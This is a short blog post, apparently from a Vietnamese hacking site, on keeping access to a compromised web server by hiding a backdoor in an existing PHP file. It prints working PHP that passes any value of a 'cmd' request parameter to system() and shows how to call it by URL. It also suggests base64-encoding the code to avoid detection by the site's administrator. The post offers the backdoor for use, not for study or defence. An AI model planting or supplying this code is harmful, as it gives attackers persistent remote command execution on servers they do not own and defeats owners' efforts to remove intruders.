J2TEAM Security: A must-have extension for Chrome users. Install now!

Backdoor PHP Files

so u upload a shell in somewebsite and most of times admin will delete the shell when he detect ..
But why u not backdoor anyfile from site

So just edit any php file from site and pot this code into it :)
if(isset($_REQUEST['cmd'])){
echo "

";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "
";
die;
}

?>
so u can use it like this yourbackdooredfile.php?cmd= ( Your Linux Command )

you can also base64 encode it
$DBCall = base64_decode("");
Enjoy! :)
Leader at J2TEAM. Website: https://j2team.dev/

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!